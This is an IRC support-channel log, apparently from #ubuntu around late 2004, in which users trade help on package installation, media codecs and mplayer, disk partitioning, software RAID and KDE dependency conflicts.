mercuruserr, s/FAQ/HOWTO/01:44
kamstrupmercurus: You can find lots about this in the Ubuntu forums01:45
mercuruslinux_galore: yes ... I want to port a .deb to ubuntu ...01:45
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Acridienmercurus: ??01:45
linux_galoremercurus: dont have to port it just get the source code then build the package01:45
mercurusI'm aware it will probably work, but I'd like to learn about how to do it - I'm happy compiling from src, but that is not the best solution when I could build it, then make it available for others01:45
mercurus"port" was probably the wrong word ... I meant, re-package for Ubuntu ...01:46
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linux_galoremercurus: the same way people make rpm's is the same way you make .deb's  you build the package with a package builder from a source package you end up with a stand alone .deb file01:46
yann__do you guys no a tex frontend like kile, but for gtk? (lyx is qt i think)01:47
mercuruslinux_galore: so man dpkg is my friend ?01:47
phillcat /proc/pci doesn't work for me01:48
Marmadukedoes any one know why the default install for ubuntu installs kernel headers for 2.5.999 ?01:48
linux_galoremercurus: here we go http://linuxdevices.com/articles/AT8047723203.html01:48
phillhow do i get divx/xvid working?01:49
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Pizbitphill: http://wiki.ubuntu.com/RestrictedFormats01:49
linux_galorephill: I use mplayer  works fine01:50
mercuruslinux_galore: thank you kindly, is there nothing to be done to ensure packages are Ubuntu-style ?01:50
sid77oh no, not again!01:50
the_oneI need some help with totem, I don't have sound when I play dvds01:50
the_oneI removed totem-gstreamer and installed totem-xine01:50
phillpizbit: it says there is licensing issue. mplayer it is01:50
kamstrupMarmaduke: Perhaps libc was built against it... Kernel hearders should match those of libc was compiled against... I think ??01:50
linux_galoremercurus: Ubuntu is built on a debian like system so really there is little needed to be done.........you can install many Debian unstable packages straight into Ubuntu with apt-get01:51
Treenakslinux_galore: but don't do that!01:51
Treenakslinux_galore: it might break horribly when hoary comes around01:51
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linux_galoreTreenaks: well not unless you familiar.....Ive added a few packages already works fine01:51
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linux_galoreTreenaks: wouldnt try adding something like gcc or gtk from debian unstable01:52
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=== linux_galore has a copy of PowerDVD for Linux can play anything legally now
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linux_galoreI grabbed it of a Turbo Linux CD01:56
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the_oneI try to install mplayer and it gives me this messages: Depends: libartsc0 but 1.2.3-1 is to be installed, libggi2 but 1:2.0.4-3 is to be installed, libungif4g but 4.1.0b1-6 is to be installed. I already installed them but still synaptic gives me this messages when I try to install mplayer. Any suggestions?01:57
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linux_galorethe_one: you need to install all those packages too01:58
the_oneI did01:58
mvo_the_one: it's probably not the correct version01:58
the_oneI looked in synaptic, it shows me that I have the right version01:58
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mvo_the synaptic in warty does not report about the needed version01:58
mvo_the_one: odd then01:58
mvo_the_one: what happens if you do (in a terminal): "sudo apt-get install mplayer"01:59
the_onegonna try now...01:59
phillthe_one: sounds like you need to add universe/multiverse as sources?01:59
the_oneit gives me the same messages02:00
linux_galoretime to go getting late02:00
the_oneI enabled universe02:00
linux_galoreits midnight..I turn into a monster....... I turn into a windows coder  lol02:01
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sid77linux_galore, do you drop also some strange green fluid or are you more likely a mr hide?02:02
mercurusthe_one: did you enable marillat02:02
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the_oneI removed libartsc0 libggi2 libungif4g02:03
mercuruswhich architecture are you using ? i386 686 ?02:03
mercurusdo an apt-cache search mplayer02:03
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mercurusand then install the version that relates to your machine ... probably mplayer-68602:03
the_oneI tried i686, it said that I need to have i586 installed, then when I try to install i586 it gives me Depends: libartsc0 (>= 1.3.0) but it is not going to be installed, Depends: libggi2 (>= 1:2.0.5) but it is not going to be installed,Depends: libungif4g (>= 4.1.3) but 4.1.0b1-6 is to be installed02:04
linux_galoresid77: no we rove offices at night with groups of lawyers looking for the precious02:04
karevollanyone know where to get "ant" (the java build tool) for ubuntu? the package "ant" doesnt exist, and libant1.6-java talks about "ant in contrib".. but contrib doesn't exist for other than debian? ... can I add debians contrib to my sources.list then? wont that break a lot of stuff?02:04
karevollthe_one: dont use the mplayer from "unstable"02:05
mercurusthe_one: sounds like the package is broken at the moment02:05
sid77linux_galore, lol!02:05
karevollthe_one: change "unstable" to "testing" on nerim.net in your sources.list02:06
karevollthen it works fine :)02:06
the_oneI'll try that02:06
=== sid77 goodbye all!
linux_galorel8terz sid02:07
linux_galoreaaaaaargh its a full moon and its midnight  .........must....not ....code....in...perl02:08
linux_galoreanyway time for bed02:09
linux_galorebye folks happy hacking02:09
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BugSi need someone with fully installed ubuntu (inclucing kdelibs, k3b, media players, video players, developer libs, etc...) to give mi a listing of his /var/cache so i can download those packages and take them home to my intrnetless ubuntu box02:10
TreenaksBugS: apt-zip!02:13
TreenaksBugS: look at it!02:13
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TreenaksBugS: (apt-cache show apt-zip)02:13
ukaszBugS: would it not be an easier task to take yours harddrive to internet cafe?02:13
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BugSukasz: then what?02:15
ukaszrun Yours system from Your hd02:15
BugSi dont think anyone will let me do that.  :-(02:16
ukaszif You connect it to a different wire (dunno the word) than just edit grub menu02:16
ukaszBugS: well try to ask first02:17
ukasz80% of caffe's I've been in allowed me to do that02:17
BugSmaybe thats because you live in some preaty developed country, unlike mine02:18
BugS;] 02:18
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TreenaksBugS: have you looked at apt-zip?02:21
BugSyes, im installing it now02:21
IOM_Detoxhave a question on newbee friendly linux???02:22
IOM_DetoxI would like to switch a friend over from win Me to linux02:22
IOM_Detoxi am using Libranet on one machine and Ubuntu on the other02:23
IOM_Detoxbut this person is VERY computer ignorant02:23
IOM_Detoxwhat ver linux would be best?02:23
kamstruphave your friend seen Ubuntu? How can he still be using Win?02:23
kamstrupah ok02:23
TreenaksI've given a computer-new friend of mine a fresh ubuntu PC02:24
Treenaksworks like a charm :)02:24
IOM_Detoxi have the machine again to disinfect from virus and spyware02:24
kamstrupYes Ubuntu is fine.02:24
kamstrupJust install it and set up the various peripherals02:24
kamstrupMaybe install a few Templates and set up IM and mailing02:25
IOM_Detoxok i figure as long as i dont try to explain functions (apt-get) and focus strictly on software,02:25
TreenaksIOM_Detox: just use synaptic for 'system updates'...02:25
kamstrupThere's no need to talk about installing/removing software02:25
IOM_Detoxnow,,, let me compicate it OK?02:25
IOM_Detoxhow about Libranet vs Ubuntu for new user?02:25
TreenaksI don't know libranet02:26
kamstrupDoes Libranet automagically mount usb-sticks and cds?02:26
IOM_DetoxI ask cause LN has a ton of games on it02:26
IOM_Detoxwell ,, most02:26
kamstrupIt is a real ewbie-treat that Gnome automatically mounts usb-sticks and cds02:27
IOM_Detoxshe does not have pendrive, and uses cd only rarely02:27
kamstruphmmm... well she might be using a pendrive when she sees how easy it is02:28
IOM_DetoxI will put it on, hopefully it will see the modem OK, if it does, then i will leave it02:28
IOM_Detoxopps ,,,, brb02:28
kamstrupWhen you a talking "games" you mean for win right?02:28
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BugSwhy dont you make .iso images with all the packages? like ubuntu cd1, cd2, cd3 etc?02:29
bob2if you want them, you can make them with the "debian-cd" program02:29
bob2but it's over very very little use to most people02:29
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ukaszcrimsun: the mistake was using --enable-static option02:30
ukaszthx for help02:30
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IOM_Detoxubuntu is only one cd right?02:34
bob2the desktop is one, yes02:34
bob2"supported" is more than one cd of stuff02:34
IOM_Detoxthere are other cd's then?02:34
bob2universe is about 15 000 cds02:34
bob2there are no other cd images02:34
bob2the other packafges are on the mirrors02:34
IOM_Detoxok, i am confused,,,02:35
bob2"there is only one cd"02:35
IOM_Detoxwhat is on the other iso's and where are they?02:35
bob2"there is a lot of software that is on no cds but are on the mirrors"02:35
IOM_Detoxoh oh02:35
bob2you've never used a debian-based system before?02:36
IOM_Detoxthen is there a listing i can asscess?02:36
bob2of available packages?02:36
IOM_Detoxi am still new to linux02:36
bob2synaptic will show it02:36
bob2computer menu -> system config -> synaptic02:37
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IOM_Detoxso on a dial-up connection,,,, 50k max,,, is there a better way to get stuff?02:37
bob2downloading cds via dialup is even slower than downloading packages via dialup02:38
IOM_Detoxusing liniws as an example... they have a listing of all software02:38
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IOM_Detoxyes but i am on high speed and can DL iso's here02:38
bob2"liniws"?  I've not heard of that.02:38
IOM_Detoxlindows sorry02:38
IOM_Detoxspelling not good02:39
bob2you can use "apt-zip" to download packages on the fast machine for the slow one02:39
IOM_Detoxfingers dont match keys well02:39
IOM_Detoxthis allows for DL but dows not install?02:39
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IOM_Detoxnow,,, i was told there is an apt command to vies pkgs on a server/......apt-casche or something lilke that?02:41
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IOM_Detoxthen topic?  apt-cache games02:41
bob2depends what you want to do02:42
IOM_Detoxdumb question,,,, i can get all this info in the apt manual?02:42
bob2and in "man apt-cache"02:43
BugScan i use apt-zip on a debian machine to download packages for the slow ubuntu machine?02:43
jindDoes anybody here know how to adjust the menu line font in opera?02:43
BugSi should modify mu apt.sources or what?02:43
bob2BugS: yes02:43
jindWhat control panel does that belong to?02:43
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bob2BugS: read the man page, I suspect02:43
FoxfyreMorning all02:44
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FoxfyreDude this is awesome! Gnome can accomodate my Microsoft Windows keyboard!02:46
TreenaksFoxfyre: uh.. what else is new?02:47
FoxfyreI'm still learning all this stuff :P02:47
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polokI'm gonna go to bed.02:47
IOM_Detoxgot to go,,,, thanks for the help all !!!!!02:47
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bcaesarhello all, I installed ubuntu on my laptop and everything works except for the screen resolution which is stuck at 800x600, it should be capable of 1024x768, how do I increase this?02:57
bob2read the wiki02:58
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danielsbcaesar: please file a bug at http://bugzilla.ubuntu.com with the output of lspci and /var/log/XFree86.0.log03:00
yohi to all03:01
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vizvayuHi! Anybody used domain authentication (pam_winbind) in Ubuntu ? I can't make it work...03:03
agwibowocan anyone tell me how can i play dvd in ubuntu?03:03
bcaesarthanks everyone03:03
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yoagwibowo , try to add multiverse repository03:07
yoand install xine03:07
agwibowoi have installed xine03:07
agwibowoi just need that libdvdcss03:07
agwibowowhere can i get it from?03:07
bob2it's in the RestrictedFormats wiki page03:08
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agwibowoand what does that mean?03:08
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bob2"go read the wiki"03:09
bob2"hint: look at the wiki.ubuntu.com/RestrictedFormats page"03:09
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wfxhi, i have some trouble with a second ide controller (SiI680, modul siimage) it looks like all ok but where is the dev mountpoint03:10
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mirak_-mornin all03:11
wfxmorning depends on te timezone :-)03:12
mirak_-well...i say goodmorning.......maybe good afternoon to you?03:12
=== Moof has just finished lunch, so it's afternoon as a result
wfxto my prob again i think the dev must be one of the md(0-n) but md0 does not work03:13
agwibowook... thx03:15
agwibowoi'm downloading...03:15
wfxthis hardaware have work (different distribtuion) where i have do a ide=reverse to grub and i found it as hdX03:16
wfxalso with a 2.6 kernel but with devfs03:17
agwibowoanyone knows how i can suspend my laptop in ubuntu?03:17
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yann__agwibowo: no but I would like to know the answer ;-)03:19
agwibowoyann_ : i used to be able to do it in SuSe 9.103:19
agwibowowhat about getting infrared to work?03:20
yann__agwibowo: this is the first *nix i have on this notebook03:20
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wfxa cat /proc/partitions show me the md-0 to md-3 and a mount -t xfs /dev/md0 /Data/CaseA/ result in one error03:22
wfx /dev/md0: can't read superblock03:22
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agwibowoyann_: i've tried a lot of distro on my notebook.. including suse, mandrake, debian, knoppix, redhat, fedora, vector, gnoppix, slax and now ubuntu.. the best so far is ubuntu (for smoothness of operation), but for completeness, i will say suse. Everything just works... but i choose to stick with ubuntu since my laptop can't bear the slowness when i run suse03:22
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fabbionewfx: what does cat /proc/mdstat says?03:22
wfxPersonalities : and unused devices: <none>03:23
wfxfabbione, that means no device right?03:23
agwibowoby the way, is the cdrom dma enabled by default in ubuntu?03:23
fabbionewfx: that means that the md hasn't started03:23
yann__agwibowo: well for me it takes a little bit till i get gnome fired up. but once running, it runs nice and smooth03:24
fabbionetry /etc/mdadm start03:24
fabbione /etc/init.d/mdadm start03:24
fabbione /etc/init.d/mdadm-raid start03:24
agwibowoyann__ : how fast is your notebook ?03:24
wfxc/init.d/mdadm start  fails03:24
fabbionewfx: hmm that's bad03:24
wfxfabbione, no prob i know what you are meaning ;-)03:24
mercurusI've just compiled an additional gnome-applet ... how do I tell GNOME as much, so I can add it to one of my panels ?03:24
yann__agwibowo: 667mhz (ppc), 512mb ram... so not to bad I think03:25
agwibowooh ya.. forgotten.. i've tried yoper as well03:25
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agwibowoyann__ : mine is 500 Mhz P3... 256 RAM03:25
wfxfabbione, but the device works as hdb (i have tested)03:25
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fabbionewfx: the point is why it is not starting03:25
wfxfabbione, so the hardisk is ok03:25
agwibowoyoper is quite ok, but the repository is not as rich as ubuntu03:25
fabbioneare the other devices of the raid ok?03:25
yann__agwibowo: ok ;-) forgot about it, but i also tried gentoo, since i have it running on my other boxes but it just takes to long for a notebook03:26
fabbionewfx: what is your mdtab or raidtab?03:26
wfxonly one pluged in (i use it not as raid)03:26
nateai am about to repartition my OS X HD and want to know what the best way to prepare the drive for Ubuntu.03:26
nateain the docs it says "Leave either a place holder partition or free space for Debian GNU/Linux"03:26
nateahow much free space should I leave?03:26
agwibowodoes anyone know a command line msn client?03:26
fabbionewfx: than you need to force the raid to start in degraded mode03:27
yann__natea: that is the way i did it03:27
nateai have a 60GB drive03:27
b_e_n_zagwibowo: bitlbee03:27
agwibowois it good? stable?03:27
yann__natea: i have 4gb for / and 6gb for /home03:27
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nateashould I use HFS+ or UFS file system?03:27
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bob2linux can read either03:27
yann__natea: for osx? take hfs+ of03:27
nateayann__, ok, so 10 GB alltogether, that is what I was thinking too.03:28
bob2but some mac os X apps cry about ufs03:28
yann__bob2 sure??03:28
mojoTo everyone: new Hoary updates brought users new Boot configtool, and new Service Initlevel tools, need more ppl for testing, plese get involved!03:28
bob2mojo: dude03:28
=== wfx telephon...
broylesi can do testing03:28
bob2mojo: please don't encourage users to use hoary until kamion/mdz/etc says so03:28
mojobob2: alritty03:28
bob2mojo: they can ask for beta testers as easily as you can, too :)03:29
nateayann__, the article on ppcnerds.org says "I made three partitions: a bootstrap, required for yaboot, a swap and a root partition. i chose XFS as my filesystem for the root."03:29
broylesis ubuntu good enough to run a production server on?03:29
bob2yann__: oh, did you mean for mac os x or linux?03:29
bob2broyles: of course03:29
nateawhat should the size of the bootstrap (yaboot) partition be?03:29
yann__natea: i use ext303:29
broylesbob2 ok.. time for a change from gentoo03:29
bob2yann__: linux will run on ext2, ext3, etc, but not ufs or hfs+03:30
yowhat about to include Mozilla Thunderbird in the next version of ubuntu ?03:30
bob2you're using gentoo on a production server?03:30
yann__bob2: that's what i meant, but it can read it03:30
bob2yo: it was already included in the last version of ubuntu!03:30
yoin mine not03:30
bob2yann__: it can read your mac os x files, yes03:30
mercurusyo: apt-get install thunderbird03:30
nateabob2, sorry, i was asking if I should make the OS X partition UFS or stick with HFS+.03:30
yook thanks !!03:30
bob2yo: it's in the mozilla-thunderbird package03:30
bob2natea: ah, sorry03:30
linux_mafiamojo - what package are they in?03:31
broylesis ubuntu a debian like system then?03:31
bob2natea: my bootstrap is 800KB03:31
bob2broyles: yes03:31
broylesi never got along with debian :/03:31
nateabob2, and that partition should be the first one on the disk?03:31
bob2broyles: why?03:32
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bob2natea: do you want to see my whole partition table?03:32
nateabob2, sure that would be helpful.03:32
youbuntu developed team is considered to do a port of k3b to gtk ?03:32
bob2natea: $flood?03:32
bob2er, #flood.03:32
broylesi never could get it to install apps propally or get used to the apt system for configuring03:32
yoi think the only thing that ubunt fails is the CD / DVD burning03:32
nateabob2, ok i'll go to #flood now03:32
bob2yo: I don't think that's on the cards, but coaster is already looking pretty good03:32
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b_e_n_zbroyles: so what distro do you use03:33
bob2broyles: erm, that sounds a lot like user error, since it works for hundreds of thousands of other people...03:33
linux_mafiaso whos running beagle?03:33
bob2broyles: unless you were using unstable, but then you're expected to know how to fix that03:33
broylesb_e_n_z i am normally use gentoo03:33
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broylesno bob2 i used the stable tree03:33
mojolinux_mafia: it's systemtool, new Hoary packages03:33
linux_mafiamojo, yeah just saw that, getting it now ;)03:34
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bob2broyles: there should be no packages at all in stable which are uninstallable03:34
broylesbob2 i think i will give it another shot... :)03:34
=== linux_mafia wishes he could meet one fellow beagle user
bob2broyles: cool :-)03:35
Iodahow I can install mplayer? I tried to add deb ftp://ftp.nerim.net/debian-marillat/ unstable main to my sources.list03:35
broyleswell i have some cds coming but i will go and d/l the image03:35
bob2Ioda: "testing", not "unstable".03:35
seb128Ioda: warty or hoary ?03:35
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Iodaseb128, warty03:36
edulixhello !03:36
broyleshello edulix03:36
edulixI have installed totem-xine and now I cannot hear anything from totem now03:36
Iodabob2, thx I'm going to try..03:36
seb128Ioda: ok, so try what bob2 said03:36
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seb128there is a version in multiverse, but not sure if it works fine03:37
nateabob2, when you use the Apple Disk Utility to make these partitions, do you have to explicitly create /dev/hda1-/dev/hda8,03:37
nateaor are some of those partitions automatically created by the OS?03:38
bob2natea: hm03:38
bob2natea: it was a while ago, but I think I just used apple disk utility to make a 10GB partition for mac OS X, and left the other 50GB unused03:38
nateai'm wondering why there are *two& Bootstrap partitions for instance.03:38
bob2then, later, I used partman to change it03:39
kerryforpreswhat is the name for the ubuntu package manager?03:39
b_e_n_zkerryforpres: apt-get03:39
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|DarkSoUl|hi there03:40
kerryforpresapt-get install new president for U.S.03:40
|DarkSoUl|just got ubuntu live cd...booted it and..well...i get ubuntu logo and a progress bar...the bar completes and after some time, the computer restarts :/03:40
bob2kerryforpres: please don't troll here03:40
nateahow big should i make the swap partition? i have 512MB RAM right now but expect to increase that to 1GB soon.03:40
|DarkSoUl|kerryforpres so how's the election?03:41
bob2natea: 512MB for swap is tons in either case03:41
b_e_n_znatea: 2Gb03:41
kerryforpres|DarkSoUl|: well it's still being run using an out-dated and un-democratic system, but other than that, pretty smoothly.03:41
nateafrom what i've heard, it should be *double* the amount of physical ram.03:41
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agwibowowhen i used xine to play dvd.03:41
agwibowothe screen is blue03:41
Iodawow! bob2 seb128 mplayer works fine, I changed my sources.list with "testing" ;)03:41
agwibowonothing there03:41
agwibowobut there's sound03:42
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b_e_n_zagwibowo: xine, totem are not exactly robust... use mplayer03:42
|DarkSoUl|just got ubuntu live cd...booted it and..well...i get ubuntu logo and a progress bar...the bar completes and after some time, the computer restarts...anyone can help me?03:43
berantlfirst off I'd like to say 'hi' to every one, and thanks for creating a great distro03:44
agwibowothere are so many mplayer03:44
agwibowowhich one should i choose?03:44
agwibowomplayer-386, mplayer-586, mplayer-k6, mplayer-k703:44
agwibowoand mplayer-68603:44
bob2what cpu do you have?03:44
agwibowopentium 3 500 Mhz03:45
berantl2nd (and this could be a total repeat question) but there is no mp3 codecs installed by default03:45
agwibowobut it says "transitional dummy..."03:45
berantlwhat is the appropriate way to fix this03:45
agwibowotransitional dummy package which can safely be removed03:45
bob2berantl: wiki.ubuntu.com/RestrictedFormats03:45
bob2berantl: feel free to complain to fraunhoffer03:45
berantlyeah I'm aware of fraunhoffer's "issues"03:46
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berantlso I take it even in universe there is no codec due to those issues03:46
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bob2please read the wiki page03:46
edulixbob2: so if I have problems with totem-xine I'd better remove it, reinstall totem-gstreamer and use mplayer?03:47
bob2edulix: no idea03:47
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bob2totem-anything has always been useless to me, tho03:47
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edulixand what about plain totem ' :P03:48
b_e_n_zedulix: unfortunately totem is buggy, use mplayer03:48
agwibowowhere is ubuntu from?03:48
bob2the word?03:49
agwibowothe distro03:49
bob2what country?03:49
b_e_n_zubuntu is an african word03:49
agwibowothe distro03:49
agwibowowhich country does it come from?03:50
agwibowojust like suse, from germany03:50
bob2all of them :-)03:50
b_e_n_zubuntu is started by Mark S., founder of Thawte03:50
b_e_n_zMark S. is from South Africa03:50
bob2mark is from south africa, but the people working on it are from lots of countries03:50
daniels(his last name is Shuttleworth)03:50
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agwibowoi c03:50
Linubiefrom the unbutu website : "Ubuntu" is an ancient African word, meaning "humanity to others". Ubuntu also means "I am what I am because of who we all are". The Ubuntu Linux distribution brings the spirit of Ubuntu to the software world03:50
bob2australia, the uk, usa, germany, france ...03:50
edulixb_e_n_z: thanks for the info :)03:50
danielsbob2: ... lithuania, brazil ...03:51
agwibowobob2: alaska03:51
agwibowowould anyone found linux in alaska?03:51
bob2there's a LUG there03:52
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altan_http://img17.exs.cx/img17/5148/firefoxwhat.gif <--- My FF is using an insane amount of RAM. 5 tabs, few images that are small to begin with03:54
agwibowoanyone here from indonesia?03:54
danielsagwibowo: no, but I speak some patchy Indonesian03:54
jbiscontno sorry, I'm comming from begium03:54
altan_turkey here03:55
jbiscontbelgium anyone?03:55
agwibowoi'm originally from indonesia, but currently in australia03:55
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monkeysmurfhi everyone03:56
agwibowowhat does warthy warthog mean then?03:56
monkeysmurfdoes anyone have experience using nessus in ubuntu?03:56
agwibowosounds like an anymal to me03:56
bob2agwibowo: it started as a joke way back when development started03:56
agwibowoi'm running nessus03:56
wfxfabbione, Starting RAID monitoring services... no starting (it was started so the last error)03:57
monkeysmurfdid you get nessus-update-plugins to work?03:57
agwibowoerrr... hmmm... good question, i don't know03:57
wfxfabbione, sorry i was on telephone03:57
danielsagwibowo: ya, saya sudah belajar basa Indo di SD/SMP/SMA dan juga sedikit di uni di Melbourne :)03:57
agwibowoi just use nessus for fun... so i don'tknow what that plugins is for..03:57
monkeysmurfwhen I tried it, it told me wget wasn't installed, but it clearly was.03:57
agwibowodaniels: oh ya?? kamu sekarang di melbourne?03:58
monkeysmurfplugins are for checking for new security vulns and things03:58
agwibowoi guess mine is workign then.. since i run all the plugins03:58
agwibowodaniels: are you studying in Melb University?03:58
danielsagwibowo: tak sekarang -- sekarang, saya di Copenhagen dengan fabbione :) tapi saya tinggal di Melbourne, ya03:58
monkeysmurfyes, but try updating the plugins --03:58
monkeysmurfsudo nessus-update-plugins in a shell03:59
danielsagwibowo: kuliah di unimelb03:59
agwibowodaniels: saya kuliah di unimelb sekarang03:59
danielssaya kuliah arts/eng03:59
agwibowoi see..03:59
danielsagwibowo: (deferred for a year right now)04:00
agwibowosoftware engineering?04:00
agwibowoi'm in my final year..04:00
agwibowowhy mplayer doesnt have gui....04:01
wfxi cant mount a hardisk on a secondary ide controlle (with sil0680 chipset) if i do  mount -t xfs /dev/md0 /Data/CaseA i got a error: mount: /dev/md0: can't read superblock04:01
bob2that's a problem with your md configuration, not the fact it's a secondary ide controller04:02
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agwibowoi'm off now...04:04
agwibowonice talking to everyone, especially daniels04:04
danielshave fun :)04:04
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afonitif you have a sound card, and a sound device on the mother board, how can you tell ubuntu which one to listen to?  inother words, to disable one of them.04:08
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afonitapplications > multimedia > volume contorl does not allow that, neither does computer > desktop preferences > sound04:09
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ElVirolohi all04:09
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ElVirolohas anyone managed to install KDE 3.3 from  http://jasmine.19inch.net/~jr/away/ubuntu/?04:10
bob2afonit: disable it in the bios if ever possible04:10
wfxok i have to go, my prob not fixed but maybe later ;-) my ubuntu to the comunity04:10
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afonitbob2:  thanks, I will try that, did not even think of that04:10
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JIMCim looking for a SATA Raid Controller anyone has experiences with adaptech 1210sa under Ubuntu?04:13
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darkersatanicJIMC: The 1210SA isn't a RAID controller,04:15
darkersatanicdespite what it says on the box.04:15
bob2JIMC: http://linux.yyz.us/sata/faq-sata-raid.html04:15
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JIMCAAR-1210SA is a raid controller i think04:15
bob2please read that faq04:16
bob2I'm pretty sure jeff garzik knows about sata ;)04:16
JIMCwhich controller i should use?04:17
darkersatanicIf you want real, true hardware RAID, you'll have to spend quite a lot of money.04:17
bob23ware is real hardware raid, but quite expensive04:17
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darkersatanicIf you just want some kind of RAID, get a basic two- or four-channel card,04:18
darkersatanicand run the Liinux software RAID drivers.04:18
SuperQdarkersatanic: you're better off with using software raid04:18
JIMCwhats about performancE?04:18
SuperQdarkersatanic: most of your basica "ide raid" boards don't do anything usefull04:18
=== sid77 hello!
SuperQJIMC: software raid has good preformance04:19
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SuperQJIMC: I run mirroring on an "old" dual athlon 1600+ system, don't notice any preformance hit04:19
RiddellElVirolo: what happened?04:20
JIMCare the sata raid cards useless?04:20
darkersatanicSuperQ: That's exactly what I meant.04:20
SuperQJIMC: for the most part04:20
bob2JIMC: they're not raid cards04:20
SuperQJIMC: 3ware makes good cards04:20
SuperQJIMC: but that's about it04:20
darkersatanicJIMC: They're not RAID -- they just implement it in in the driver.04:20
JIMCtoo expensive for me04:20
SuperQmaybe some of the higher end adaptec04:20
SuperQbut nothing from promise or the like04:21
JIMCdo the cheap cards have a processor or do the Main CPU all the work?04:21
SuperQmain cpu does all the work04:21
SuperQJIMC: it also depends on if you are doing mirroring or different kinds of striping04:22
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SuperQJIMC: how many drives, and what are you planing to do04:22
JIMCi wanna do mirroring04:22
JIMC2 drives04:22
SuperQyou won't see any gain with a raid board04:22
SuperQjust headaches04:22
darkersatanicSuperQ: I _think_ the Adaptec 2410SA might have some form of processing offload on it, but I'm not certain.04:22
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SuperQdarkersatanic: yea.. some of them do, but it's only a gain for RAID504:23
JIMCthe gain is security04:23
SuperQhow's that?04:23
SuperQA friend of mine was using a promise controler, the card was having trouble, so he bought a new one of the same model04:24
SuperQbetween 2 cards of the same model, they changed the format of the mirroring04:24
SuperQand he lost all his data04:24
ElViroloRiddell: hi, sry04:24
darkersatanicSuperQ: That's insane (but I can believe it)04:24
SuperQdarkersatanic: yea04:24
JIMCthats bad... but do you have a better idea04:24
RiddellElVirolo: did you manage to get anything installed?04:25
SuperQlinux md04:25
SuperQworks fine, very reliable04:25
darkersatanicJIMC: Yes -- run the Linux software RAID stuff.04:25
ElViroloRiddell: well, I wandered whether i had to comment some sources in my sources.list04:25
ElViroloRiddell: because it seems there are some conflicts04:25
RiddellElVirolo: what are the conflicts?  what do you have in sources.list?04:25
SuperQyou can sometimes see faster preformance with software raid, because the main CPU is faster than the CPU on the raid board :)04:25
darkersatanicJIMC: I've had a 3-disk RAID5 software array running on a machine for a few years.04:25
JIMCdoes ubuntu suporrt software raids during installation process?04:25
darkersatanicJIMC: Works perfectly -- even when a disk died.04:26
SuperQJIMC: yes, it does04:26
bob2depends how hard the disk dies04:26
JIMCdo i need any hardware?04:26
SuperQbob2: of course04:26
SuperQbob2: i've had the same problem with a 3ware04:26
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darkersatanicbob2: It wasn't very bad in this case, but it was enough to get the disk kicked from the array. I only noticed when it emailed me to tell me the disk had gone.04:26
SuperQbob2: drive died in a funny way.. corrupted the raid04:26
ElViroloRiddell: i'm posting my /etc/apt/sources.list in #flood04:27
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SuperQthen only decently safe raid I've been able to find is all fibre-channel stuff04:27
SuperQand if you think $250 is expensive for a 3ware04:27
SuperQyou don't want to know what fibre-channel costs04:27
JIMCwhcih raid levels are supported drung installation?04:28
SuperQJIMC: all04:28
JIMCwhats rebuild process?04:28
JIMCdoes the system boot if a disk dies?04:28
bob2JIMC: you don't know much about raid?04:28
phill/dev/hda2 /mnt/store ntfs ro,utf8,umask=000 0 0deb http://archive.ubuntu.com/ubuntu warty universe04:28
philldeb-src http://archive.ubuntu.com/ubuntu warty universe04:28
SuperQJIMC: as long as grub is on both disks, yes04:28
bob2JIMC: the software raid howto explains it all, iirc04:28
JIMCi know the raid levels, not more04:28
RiddellElVirolo: and what happens when you try to apt-get install kdebase?04:29
JIMCok i read it04:29
SuperQJIMC: basicaly, with software raid, you partition a new drive to repalace the broken one04:29
SuperQJIMC: then you run a raidhotadd command, and it will start rebuilding04:29
SuperQJIMC: easy as that04:29
JIMCsounds good04:29
SuperQdo you plan to use LVM?04:30
JIMCwhats lvm?04:30
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JIMCwhich sata card is supported by ubuntu?04:31
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RiddellElVirolo: hmm, it says it's impossible but it doesn't say why it's impossible04:31
SuperQJIMC: anything in
ElViroloi get disconnected when I try to post the output of apt-get install kdebase in #flood ... pbly too long...04:32
ElVirolooh you read what I posted?04:32
darkersatanicJIMC: Google for "Linux SATA Status Report"04:32
ElViroloi'll try and comment the universe source in sources.list04:32
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RiddellElVirolo: I got as far as 15:30 < ElVirolo> que vous avez demand l'impossible, ou bien, si vous utilisez04:33
bob2ElVirolo: use a less broken IRC client04:33
ElViroloi use gaim04:34
ElVirolois xchat better?04:34
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ElViroloi'll just post a sample04:34
rcaskey_does x orgdo time-based releases?04:36
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elvirolosry about that, i'm using xchat right now04:36
Riddellrcaskey_: no, releases are decided by the board04:37
danielsrcaskey_: yes04:37
danielsRiddell: yes, and it's on a time-based schedule ... :)04:37
danielsRiddell: typically six months, but there's talk of extending this to eight for r7, as going modular is a *lot* of work04:38
danielsthe only reason there's no date yet is that there is still no release manager04:38
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RiddellI submit to daniels04:38
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elviroloRiddell, ok, i've posted the output in #flood04:39
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rebirthlsusb shows a connected device04:39
rebirthhow do i mount it?04:39
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Riddellelvirolo: well I'm confused, you should have kate et al == 4:3.3.0-104:41
Riddellelvirolo: what does apt-cache show kate | grep Version  give you?04:42
elviroloVersion: 4:3.3.0-104:42
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Riddellelvirolo: c'est fou04:44
Riddellelvirolo: what does sudo apt-get install kdelibs  do?04:44
phillhi, i installed gstreamer-mad but rhythmbox still won't play mp3s?04:44
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stvnphill: you need gstreamer0.8-mad04:44
phillthats the one i apt-getted04:45
stvnphill: sound is working fine?04:45
phillwavs play04:45
stvnphill: tried restarting rhythmbox?04:45
phillno :D04:45
mubix?Question? Has anyone in here used ndiswrapper w/ Ubuntu yet?04:45
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erikhey, is there any "ubuntu" way to install the binary nvidia drivers?04:46
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erikor should I just grab them from nvidia's website04:46
rcaskey_phill: did you get the 0.8rpm?04:46
rcaskey_errr deb04:46
rebirthlsusb shows a connected device04:46
rebirthhow do i mount it?04:46
rebirthits an mp3 player04:46
rebirthBus 002 Device 005: ID 0471:1120 Philips Creative Rhomba MP3 player04:46
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elviroloRiddel: strange, isn't it?04:47
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stvnerik: you can just do it the ubuntu way, check the wiki for the howto04:47
erikstvn: thanks04:47
mubixstvn, know anything about ndiswrapper?04:48
yoany app to show the hard drive space ?04:48
stvnyo: nautilus04:48
stvnmubix: nope, sorry04:48
rebirthanyone know? :x04:49
mubixI guess i'll just wade around till someone does04:49
Riddellelvirolo: what happens if you try to install just kdelibs  or just  kate?04:49
stvnrebirth: doesn't it appear in disks?04:49
yostvn , where option ?04:49
stvnyo: just do no select anything and look at the statusbar at the bottom04:49
rebirthstvn where?04:49
yostvn , don't show anything04:50
elviroloRiddell, kate: Dpend: kdelibs4 (>= 4:3.3.0) mais ne sera pas install04:50
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stvnrebirth: in computer > disks04:50
